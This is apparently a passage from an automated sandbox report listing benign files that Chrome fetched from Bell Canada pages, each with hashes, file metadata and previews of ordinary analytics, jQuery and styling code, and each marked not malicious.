                                                                                                                                                                                                                                                                                                                                      Preview:function setechatCookie(e, t) { "https:" == window.location.protocol ? document.cookie = e + "=" + t + ";domain=.bell.ca;path=/;secure=true;samesite=Lax" : document.cookie = e + "=" + t + "; path=/; domain=.bell.ca;" } function getechatCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var o = e.split("=")[0], i = e.substring(e.split("=")[0].length + 1); t[o.trim()] = i }), t[e] } function dragElement(e, t) { if (null !== e) { var o = 0, i = 0, c = 0, s = 0; if (-1 != navigator.userAgent.indexOf("MSIE") || !0 == !!document.documentMode) var a = document.getElementById("mydiv").getBoundingClientRect().left; else var a = $(window).width() - e.offsetWidth; var l = $(window).height() - e.offsetHeight; function p(e) { (e = e || window.event).preventDefault(), c = e.clientX, s = e.clientY, document.onmouseup = r, document.onmousemove = n } function n(p) { if ((p = p || window.event).preventDefault(), o = c - p.clientX, i = s - p.clientY, c = p.clientX, s = p.cli
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                      MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                                                      SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                                                      SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                                                      SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://px.ads.linkedin.com/attribution_trigger?pid=37981&time=1730380379197&url=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go%23EXT%3DMOB_URL_branch_getapploginpage_012423_MH
                                                                                                                                                                                                                                                                                                                                      Preview:{}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (50645), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):50645
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.225631785461232
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:Uzyon9YTQ4ByVdAy4sQzi+E9wieWDL3fo6KeKb2OGxTshwNd0snoCcC3ja5DRo2V:UmPQ4BKAy43zif9wieWNoAywbo
                                                                                                                                                                                                                                                                                                                                      MD5:152A196798A7BC72D28F0E1EF5D1B9E9
                                                                                                                                                                                                                                                                                                                                      SHA1:DA3C3B4B89D5B471AA221590F1B0DCC9EDDBD7D2
                                                                                                                                                                                                                                                                                                                                      SHA-256:C80DA5C0824B5088CAA56C5CB0F4F3304EC58117D851AF1913BA97600FA1D714
                                                                                                                                                                                                                                                                                                                                      SHA-512:25EE05FD0740EDF0714656B612DE0820B5CC7E1A4BDCEECF549344B944DE227A1A5177041810A8F0A608428D34F3875CC6DBEE2B9549EE84EDE5FACD0577708D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var StoreLocator,StoreLocatorAutoComplete,GlobalNavLogin,ShoppingCart,GlobalNavigation,VoiceSearch;(function(n){"function"==typeof define&&define.amd?define(["jquery"],n):n(jQuery)})(function(n){n.ui=n.ui||{};n.ui.version="1.12.1";var i=0,t=Array.prototype.slice;n.cleanData=function(t){return function(i){for(var r,u,f=0;null!=(u=i[f]);f++)try{r=n._data(u,"events");r&&r.remove&&n(u).triggerHandler("remove")}catch(e){}t(i)}}(n.cleanData);n.widget=function(t,i,r){var f,u,o,h={},e=t.split(".")[0],s;return t=t.split(".")[1],s=e+"-"+t,r||(r=i,i=n.Widget),n.isArray(r)&&(r=n.extend.apply(null,[{}].concat(r))),n.expr[":"][s.toLowerCase()]=function(t){return!!n.data(t,s)},n[e]=n[e]||{},f=n[e][t],u=n[e][t]=function(n,t){return this._createWidget?(arguments.length&&this._createWidget(n,t),void 0):new u(n,t)},n.extend(u,f,{version:r.version,_proto:n.extend({},r),_childConstructors:[]}),o=new i,o.options=n.widget.extend({},o.options),n.each(r,function(t,r){return n.isFunction(r)?(h[t]=function(){fun
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x359, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):12306
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.957752936273148
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:JTbenClUktpq0zTleiKQTy1syfi95/EJcP:JfenClUCKQCpa90A
                                                                                                                                                                                                                                                                                                                                      MD5:5C865DBDBE5489CA99F421A6B973F614
                                                                                                                                                                                                                                                                                                                                      SHA1:7AE0226D959ABE9E5F8D286EEBC3DF13240DE2A5
                                                                                                                                                                                                                                                                                                                                      SHA-256:2931A8B701600DA4EEC98964180AA22F475ABCF44FD9F2D5CE4B11DB2BAA3B38
                                                                                                                                                                                                                                                                                                                                      SHA-512:3F0CB8F833EDD6CC32842136A258756EEA234F81791BA4B95F3EB126B5205FD07FBB48B86387EC0632DD85CD68F14CC320376B8705394B7D4F75810D3393C3C6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/Styles/RSX/mybell/img/img_login_MyBell_June2021.jpg
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................".."............................................................g...................................................................!1.."2AQBRqs....#45abr.......36CST...Fc.....V...$%D................................................!.1.AQa"b..2Rr............?..j.T.$(.....;m..83.{ps.i....+...~..W..B.Wg..........;.....P.....'..5r....!=4.pm].......Q.evw...\.{+...OM\j...]..Bzj.W(^......W..B.Sg...........;.....P.....'..5r........\j...J...|.p..:.......5F.....T..ER*.T.v...VOwp...W..`..Ak.n.M.Y.)..7nV...%.`G.|y.1..H......8........{.u.B2R!,.}/i.uj$G.O.I......?.z.V......]0.D...*.:..T\..................._?.O..&....A./.....M[.Q..G._?.O..&..d...v..Y.e,q .......p*.Z.X...-.....u.:K..=..uj$..T................R^P.c.]7.r..ut..Q......9?..:5.K9D......=[.3.c.?..o.....V...?R.Q...Q..jO..n.Gd.#.h...[.v.YPzVY*.:...S..E...P.K....p...w./.^n.Tq.O..+..Ch.z.!C.8......F.>.....U&..F.jm%.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32766)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):33462
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.357057188294372
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:oLXw5OhrPiX7fVXt9KQ2vYlcOe9kBEemysr0:oLXw5OhraX7f58Yxq/0
                                                                                                                                                                                                                                                                                                                                      MD5:F259EE6445C19C2CE3C64A1B117A4F35
                                                                                                                                                                                                                                                                                                                                      SHA1:A4C64554F653AB4E5BD5D2D03CE5685BB0A9DDB8
                                                                                                                                                                                                                                                                                                                                      SHA-256:D6B423C91328EEC9C218DD8B21AE1E676987D574E5432411A32806E5DD2BDE32
                                                                                                                                                                                                                                                                                                                                      SHA-512:8050C59A188BF36A920EE6BD90BA52F14967AD2085A32A37D9211C265803C962276146F8FD5F8487D42763CE9A68D3DC6CCD053322B57DE52FAF3A03962DBB99
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement.js`..function AppMeasurement(f){var g=this;g.version="2.22.0";var p=window;p.s_c_in||(p.s_c_il=[],p.s_c_in=0),g._il=p.s_c_il,g._in=p.s_c_in,g._il[g._in]=g,p.s_c_in++,g._c="s_c";var d=p.AppMeasurement.ic;d||(d=null);var l,b,k,m=p;try{for(l=m.parent,b=m.location;l&&l.location&&b&&""+l.location!=""+b&&m.location&&""+l.location!=""+m.location&&l.location.host===b.host;)l=(m=l).parent}catch(e){}g.C=function(e){try{console.log(e)}catch(t){}},g.Ra=function(e){return""+parseInt(e)==""+e},g.replace=function(e,t,a){return!e||e.indexOf(t)<0?e:e.split(t).join(a)},g.escape=function(e){var t,a;if(!e)return e;for(e=encodeURIComponent(e),t=0;t<7;t++)a="+~!*()'".substring(t,t+1),0<=e.indexOf(a)&&(e=g.replace(e,a,"%"+a.charCodeAt(0).toString(16).toUpperCase()));return e},g.unescape=function(e){if(!e)return e;e=0<=e.indexOf("+")?g.replace(e,"+"," "):e;try{return decodeURIComponent(e)}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32002), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):211386
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.512676080177846
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:h19KR161Ln07BiIR4i8ZXRQr1ZXgkn+KPG/rbfvpoceZbdgzlVR0mukInodC5E7E:h19KRUqtio8/rDpoceZbdgzjUkIMC5EQ
                                                                                                                                                                                                                                                                                                                                      MD5:FA7FE72C0230B7C15DEB6D3463B83F5E
                                                                                                                                                                                                                                                                                                                                      SHA1:36B191A739659089C84F070A771293C8057A2FE8
                                                                                                                                                                                                                                                                                                                                      SHA-256:F6798E8EA6C8EBB7E954D426312E9EEF758FE4127D9F31684FD32B47471CA3CC
                                                                                                                                                                                                                                                                                                                                      SHA-512:D59624A0C9DC6FBBB87423CDBDED6E259CDBFA6E51DA5FFB0BCEF5F4E97252EB011045029FD93D90DC629C9C05C81227AB24CF1977F4E237EB52C42DE882AB82
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://cdn.decibelinsight.net/i/14028/693653/di.js
                                                                                                                                                                                                                                                                                                                                      Preview:/**. * Copyright 2024 Medallia Inc.. * https://www.medallia.com/. */.window._da_=window._da_||[];_da_['jsVersion']=1720471118;_da_["da_websiteId"] = 693653;_da_["returnVisit"] = false;_da_["accountNumber"] = 14028;_da_["da_dnsRecord"] = "collection.decibelinsight.net";_da_["intPreScripts"] = function(){try{(function(){function c(b){if(b.detail&&b.detail.tokens){b=b.detail.tokens;var d,e=[];for(d in b)if(b.hasOwnProperty(d)){var a=b[d];if(a["activity.name"]&&a["experience.name"]&&a["experience.id"]&&a["activity.id"]){var c=a["activity.name"]+" : "+a["experience.name"];a=a["activity.id"]+"-"+a["experience.id"];-1>=e.indexOf(a)&&(decibelInsight("sendIntegrationData","AdobeTarget",{name:c,id:a}),e.push(a))}}}}window.di_adobe_event_bound||(document.addEventListener("ATDecibelTokens",c),window.di_adobe_event_bound=!0)})();}catch(e){window[window.DecibelInsight].warn('DecibelInsight: Configuration error in Integration Tag.', e.toString()); if (window[window.DecibelInsight].handleException) wi
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4922), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4922
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.863524094612693
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUPmIQ4Ew:1DY0hf1bT47OIqWb1ORQw
                                                                                                                                                                                                                                                                                                                                      MD5:7A37A3127551279E315317DCCC97D6DD
                                                                                                                                                                                                                                                                                                                                      SHA1:CE2398182B08AA23549FD95639871A75603971F5
                                                                                                                                                                                                                                                                                                                                      SHA-256:921DA9B775D561A850CC097A6DC56A06F20BDA438BFC0E5C409201356D09AF68
                                                                                                                                                                                                                                                                                                                                      SHA-512:8B76011C524E26023D121381530DB6D6A5F4ED6CF594A3FEE05221003B3146F5F5DDEC966A8B7D346274BD9AB9642F936E414B62AA1AE71847F0E25ECC36DAE6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (740)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):887
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.446921814250921
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zl7Iuct/BMl7I8NM8E6GKplkIJrYYKRWa0DqJK4Wa05ajHxQ:zl7Itt/BMl7I8N9lkwHWhn1jxQ
                                                                                                                                                                                                                                                                                                                                      MD5:3818BC730EF492E85BA9898D40A134D8
                                                                                                                                                                                                                                                                                                                                      SHA1:73AB53526E41414B786EB0DBA9B0C8B040007BE5
                                                                                                                                                                                                                                                                                                                                      SHA-256:2546C848C5DCAFFD7F24D336ED5D204062909B898FE55C50A363249770385BB5
                                                                                                                                                                                                                                                                                                                                      SHA-512:605B1074196E13A4F8A504434A17B5B6EDA89E3C30FEA6F90E2E6955618AE39EF769E3715FD9832AE09741D8D75C41055D074327B589B73A68245F9A3F50C0E1
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd8b65dba67c44432abc9811e00526643-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd8b65dba67c44432abc9811e00526643-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd8b65dba67c44432abc9811e00526643-source.min.js', "try{var __bda_promise_twtr=new Promise((function(e,t){var r,n,a,i,o,s,c=(r=window,n=document,a=\"script\",!void(r.twq||(i=r.twq=function(){i.exe?i.exe.apply(i,arguments):i.queue.push(arguments)},i.version=\"1.1\",i.queue=[],(o=n.createElement(a)).async=!0,o.src=\"//static.ads-twitter.com/uwt.js\",(s=n.getElementsByTagName(a)[0]).parentNode.insertBefore(o,s)))),u=\"en\"==_satellite.getVar(\"d_language\")?\"nu9ts\":\"nuhbc\";twq(\"init\",u),twq(\"track\",\"PageView\"),c?e(\"success\"):t(\"error\")}))}catch(e){console.log(\"Adobe Launch: Error: Window Loaded - Twitter(Site wide):\",e)}");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (774)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):43211
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.519539023318683
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:0W+FIMt+5FdAPnMhpn2g6IKO9yZI92tMujTXOyrbARaLPk6TO3Am8biK4gZK/Xf+:0Wz/pKC9qng6T3WKXK/XfNPhNREhSQ
                                                                                                                                                                                                                                                                                                                                      MD5:DA800C7A6725ACD0F789BD737CF188FF
                                                                                                                                                                                                                                                                                                                                      SHA1:C3B1073526101A7490744695BFCD2871ABBFFB04
                                                                                                                                                                                                                                                                                                                                      SHA-256:7A28F558E497F8ECEBC8242CCBA48DE0E9CB6A1D9A49A2DAF020935EA9449E27
                                                                                                                                                                                                                                                                                                                                      SHA-512:3C14202920560B97D1D7D9050168DCA5F5DF3289E09148AF6AB73D74A4D3EE0F88E0E37D26B204A37F840BEB5550A69DF51F6EC9BCDD6B7AE714FDC2EAB4938A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function dn(){function fb(u,t){return Wa(u)&&"href"===t?1:Za(u)&&"value"===t?32:qc.Qd.some(function(A){return A.test(t)})?16:Pa(u)&&"value"===t?2===mb(u)?16:1:1}function mb(u){if(Ra(u)||Ra(u.parentNode))return 1;qd.has(u)&&Yc.set(u,Yc.get(u)|8);ad.has(u)&&Yc.set(u,Yc.get(u)|2);uc.has(u)&&(qc.qb?kd.set(u,kd.get(u)|1):kd.set(u,kd.get(u)|4));La(u)&&u.hasAttribute("data-dtrum-mask")&&(Oa(u)?kd.set(u,kd.get(u)|4):Yc.set(u,Yc.get(u)|10));if(Yc.has(u))return Yc.get(u);if(kd.has(u))return kd.get(u);var t=.u,A=!1;t.nodeType===Node.TEXT_NODE&&(t=t.parentNode,A=!0);var P=Oa(t);var ea=A;void 0===ea&&(ea=!1);ea=!P||ea||"OPTION"===t.nodeName?(P?kd:Yc).get(ea?t:t.parentNode):void 0;var Ma=void 0;P&&cb(qc.ub,t)&&(Ma|=4);!P&&cb(qc.sb,t)&&(Ma|=2);!P&&cb(qc.yb,t)&&(Ma|=8);if(Ma||P)a:if(P=void 0===P?!1:P,A=void 0===A?!1:A,!P&&Ma)ea=Ma;else{if(P){Ma=Ma&&!(Ma&1)||qc.qb?(!Ma||Ma&1)&&qc.qb||Ma&&!(Ma&1)&&!qc.qb?t.parentNode&&Oa(t.parentNode)?ea&&!(ea&1):!0:!1:ea&&!(ea&1);if(A&&Ma){ea=ea?ea:2;break a}if(Ma){ea
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):8
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.5
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:x:x
                                                                                                                                                                                                                                                                                                                                      MD5:402E7A087747CB56C718BDE84651F96A
                                                                                                                                                                                                                                                                                                                                      SHA1:7CE01F6381463362CF6AEF2F843A59261E8F5587
                                                                                                                                                                                                                                                                                                                                      SHA-256:662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
                                                                                                                                                                                                                                                                                                                                      SHA-512:5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.net/eum/results.txt
                                                                                                                                                                                                                                                                                                                                      Preview:Success!
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.904157601986404
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREuuyqXXl6EmvXQ1CSHI:UrXiFqX1oXMRo
                                                                                                                                                                                                                                                                                                                                      MD5:9CE7691D8D5F612FF9BA2A7959DB2FAE
                                                                                                                                                                                                                                                                                                                                      SHA1:5FA3289AC0A2F1234761C32687AB87007BE7FF57
                                                                                                                                                                                                                                                                                                                                      SHA-256:68228B201FDA277B68D46259AA8625F4E4C865FF3C6D439288460A1DD3E71548
                                                                                                                                                                                                                                                                                                                                      SHA-512:1B2991A156000CCBBD9DEC4AB523713EE683FEF09BDEA4D032390146E4058A36774B41B6FBE606270E930248F0989C1CE063919B0DA7632E74EF58EB08AE8D04
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__12
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__12 === 'function' && branch_callback__12("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1302), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1302
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.974646865161954
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:ssISIWlu8IWl/IWlw0IWl8/Cq8hDMCVAvVm190xH:ssISIWlu8IWl/IWltIWlgGDMCCMz0h
                                                                                                                                                                                                                                                                                                                                      MD5:D0B8C08CD4C915E328E995A7501AE0CC
                                                                                                                                                                                                                                                                                                                                      SHA1:290DE86997A33A72FE1F6AFAB8A7105172E9516C
                                                                                                                                                                                                                                                                                                                                      SHA-256:DD7D24013C6421BAD2B11D52B592FB6FA0246EC19744FF8370C590D73E15A4C3
                                                                                                                                                                                                                                                                                                                                      SHA-512:47AF1E3B9236A02AAB4F8F50DE74075E6D59A85D00C1AF5CF208DB3170458D8FBC382CFCCF042D52262017B02FF11D19F5E46B6E52EB884ECBBE1FAF59EADF3F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/BRF2/Master/content/css/login-tracker-icon.min.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:@font-face{font-family:login-tracker;src:url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/content/fonts/login-tracker-icons.eot??ver=202005102244) format("embedded-opentype"),url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/content/fonts/login-tracker-icons.woff?ver=202005102244) format("woff"),url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/content/fonts/login-tracker-icons.ttf?ver=202005102244) format("truetype"),url(https://mybell-qc.akamaized.net/Styles/BRF2/Master/content/fonts/login-tracker-icons.svg?ver=202005102244) format("svg");font-weight:400;font-style:normal}.icon-login{font-style:normal;speak:none;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.icon-login:before{font-family:login-tracker;position:static}.icon-circle-silhouette:before{content:"\ea4d"}.icon-close:before{content:"\e624"}.icon-info:before{content:"\e954"}.icon-env:before{content:"\e621"}.icon-login-e
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
